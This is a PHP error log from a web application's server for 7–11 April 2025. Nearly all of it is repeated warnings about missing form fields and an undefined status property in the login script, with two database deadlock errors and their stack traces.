/home/emeraadmin/public_html/pages/submit_form.php on line 12 [07-Apr-2025 04:00:34 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [07-Apr-2025 04:00:34 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [07-Apr-2025 04:00:34 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [07-Apr-2025 04:00:34 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [07-Apr-2025 04:00:34 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [07-Apr-2025 04:00:34 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [07-Apr-2025 04:00:34 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [07-Apr-2025 04:00:34 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [07-Apr-2025 04:11:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 04:11:44 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Apr-2025 04:16:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 04:16:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Apr-2025 04:40:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 04:42:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 04:49:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 04:51:40 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [07-Apr-2025 04:51:40 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [07-Apr-2025 04:51:40 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [07-Apr-2025 04:51:40 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [07-Apr-2025 04:51:40 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [07-Apr-2025 04:51:44 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/completedsubtaskform.php on line 212 [07-Apr-2025 04:51:44 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/completedsubtaskform.php on line 216 [07-Apr-2025 04:57:18 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [07-Apr-2025 04:57:18 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [07-Apr-2025 04:57:18 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [07-Apr-2025 04:57:18 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [07-Apr-2025 04:57:18 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [07-Apr-2025 04:57:18 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [07-Apr-2025 04:57:18 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [07-Apr-2025 04:57:18 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [07-Apr-2025 04:57:18 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [07-Apr-2025 04:57:18 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [07-Apr-2025 04:57:18 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [07-Apr-2025 05:16:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 05:29:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 05:41:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 05:41:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 05:55:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 05:57:42 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [07-Apr-2025 05:57:42 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [07-Apr-2025 05:57:42 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [07-Apr-2025 05:57:42 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [07-Apr-2025 05:57:42 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [07-Apr-2025 05:57:42 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [07-Apr-2025 05:57:42 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [07-Apr-2025 05:57:42 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [07-Apr-2025 05:57:42 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [07-Apr-2025 05:57:42 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [07-Apr-2025 05:57:42 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [07-Apr-2025 06:30:54 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Apr-2025 06:48:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 07:02:56 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Apr-2025 07:37:51 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [07-Apr-2025 07:37:51 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [07-Apr-2025 07:37:51 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [07-Apr-2025 07:37:51 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [07-Apr-2025 07:37:51 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [07-Apr-2025 07:37:51 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [07-Apr-2025 07:37:51 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [07-Apr-2025 07:37:51 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [07-Apr-2025 07:37:51 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [07-Apr-2025 07:37:51 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [07-Apr-2025 07:37:51 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [07-Apr-2025 07:43:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 08:19:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 08:34:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 10:14:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 10:44:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 13:11:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 13:11:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Apr-2025 20:45:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 22:26:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 22:40:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 23:43:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 00:15:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 00:19:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 01:29:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 01:31:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 01:34:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 01:36:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 02:30:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 02:33:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Apr-2025 02:33:30 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Apr-2025 02:42:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 03:21:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 03:23:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 03:25:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 03:26:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 04:25:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 05:08:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 05:47:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 06:15:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 06:29:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Apr-2025 07:10:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 07:42:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 07:44:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 08:04:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 08:09:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 10:51:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 12:13:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 12:13:54 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Apr-2025 16:39:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 23:00:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 00:47:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 00:52:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 00:58:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 01:23:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 01:26:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Apr-2025 01:26:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Apr-2025 02:03:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 02:20:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 02:39:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 03:13:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 03:30:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 03:37:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 03:42:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 03:43:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Apr-2025 03:58:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 04:27:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 04:33:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 04:39:04 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[40001]: Serialization failure: 1213 Deadlock found when trying to get lock; try restarting transaction in /home/emeraadmin/public_html/Classes/Database.php:78 Stack trace: #0 /home/emeraadmin/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/emeraadmin/public_html/Service/TaskFormService.php(32): Database->execute() #2 /home/emeraadmin/public_html/pages/submit_form.php(40): TaskFormService->insertTaskForm(Object(TaskForm)) #3 {main} thrown in /home/emeraadmin/public_html/Classes/Database.php on line 78 [09-Apr-2025 05:01:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 05:26:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 05:30:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 05:36:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 05:43:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 06:35:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 06:45:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 07:06:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 07:16:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Apr-2025 07:30:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 07:52:02 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[40001]: Serialization failure: 1213 Deadlock found when trying to get lock; try restarting transaction in /home/emeraadmin/public_html/Classes/Database.php:78 Stack trace: #0 /home/emeraadmin/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/emeraadmin/public_html/Service/TaskFormService.php(32): Database->execute() #2 /home/emeraadmin/public_html/pages/submit_form.php(40): TaskFormService->insertTaskForm(Object(TaskForm)) #3 {main} thrown in /home/emeraadmin/public_html/Classes/Database.php on line 78 [09-Apr-2025 08:12:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 09:35:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 11:46:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 14:22:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 17:51:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 20:53:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 23:39:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 00:35:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 01:52:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 02:07:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 02:31:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 03:02:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 03:11:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 03:14:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 03:20:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 03:28:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 03:33:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 04:14:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 04:23:04 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 04:23:24 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 04:23:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 05:10:13 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [10-Apr-2025 05:10:13 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [10-Apr-2025 05:10:13 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [10-Apr-2025 05:10:13 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [10-Apr-2025 05:10:13 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [10-Apr-2025 05:10:13 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [10-Apr-2025 05:10:13 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [10-Apr-2025 05:10:13 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [10-Apr-2025 05:10:13 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [10-Apr-2025 05:10:13 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [10-Apr-2025 05:10:13 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [10-Apr-2025 05:21:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 05:22:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 05:22:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 05:22:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 05:25:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 05:26:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 05:28:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 05:29:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 05:31:26 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 05:39:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 05:44:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 05:51:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 05:59:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 07:16:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 07:17:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 07:45:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 08:09:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 08:22:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 09:40:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 12:03:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 12:03:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 12:35:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 13:48:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 14:52:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 14:52:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 14:53:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 14:53:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 14:58:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 15:31:04 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 16:27:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 21:58:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 22:43:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 01:03:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 01:03:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Apr-2025 01:03:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 